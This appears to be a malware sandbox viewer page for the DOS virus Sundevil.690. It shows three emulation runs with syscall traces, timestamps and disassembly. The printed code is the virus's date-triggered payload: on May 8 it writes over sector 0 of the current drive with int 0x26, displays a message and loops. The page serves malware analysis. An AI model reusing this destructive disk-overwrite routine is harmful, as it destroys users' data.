Sample viewer

vx.netlux.org/Virus.DOS.Sundevil.690

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:58:16.550479878Z 42 PC: 12a4d | Get date 0x12a4d: cmp dx, 0x508
0x12a51: je 0x12a55
0x12a53: jmp 0x12a71
0x12a55: mov ah, 0x19
0x12a57: int 0x21
0x12a59: xor bx, bx
0x12a5b: mov cx, 1
0x12a5e: xor dx, dx
0x12a60: int 0x26
0x12a62: popf
0x12a63: push cs
0x12a64: pop ds
0x12a65: lea dx, word ptr [bp + 0x9e]
0x12a69: mov ah, 9
0x12a6b: int 0x21
0x12a6d: int 5
0x12a6f: jmp 0x12a6d
0x12a71: call 0x12aca
0x12a74: sub ax, 0x1000
0x12a77: push ax
2018-12-17T22:58:16.553194213Z 53 PC: 12a9d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:58:16.55463535Z 37 PC: 12ac4 | Set interrupt vector (Interrupt = '33' AKA 'Random read')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12820,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:35.611570939Z 42 PC: 12a4d | Get date 0x12a4d: cmp dx, 0x508
0x12a51: je 0x12a55
0x12a53: jmp 0x12a71
0x12a55: mov ah, 0x19
0x12a57: int 0x21
0x12a59: xor bx, bx
0x12a5b: mov cx, 1
0x12a5e: xor dx, dx
0x12a60: int 0x26
0x12a62: popf
0x12a63: push cs
0x12a64: pop ds
0x12a65: lea dx, word ptr [bp + 0x9e]
0x12a69: mov ah, 9
0x12a6b: int 0x21
0x12a6d: int 5
0x12a6f: jmp 0x12a6d
0x12a71: call 0x12aca
0x12a74: sub ax, 0x1000
0x12a77: push ax
2018-12-25T12:36:35.613635481Z 53 PC: 12a9d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:36:35.614704145Z 37 PC: 12ac4 | Set interrupt vector (Interrupt = '33' AKA 'Random read')

{"DateBased":true,"Day":8,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12820,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:36.012277607Z 42 PC: 12a4d | Get date 0x12a4d: cmp dx, 0x508
0x12a51: je 0x12a55
0x12a53: jmp 0x12a71
0x12a55: mov ah, 0x19
0x12a57: int 0x21
0x12a59: xor bx, bx
0x12a5b: mov cx, 1
0x12a5e: xor dx, dx
0x12a60: int 0x26
0x12a62: popf
0x12a63: push cs
0x12a64: pop ds
0x12a65: lea dx, word ptr [bp + 0x9e]
0x12a69: mov ah, 9
0x12a6b: int 0x21
0x12a6d: int 5
0x12a6f: jmp 0x12a6d
0x12a71: call 0x12aca
0x12a74: sub ax, 0x1000
0x12a77: push ax
2018-12-25T12:36:36.017492648Z 25 PC: 12a59 | Get default drive
2018-12-25T12:36:36.639857193Z 9 PC: 12a6d | Display string (Could not find end pointer)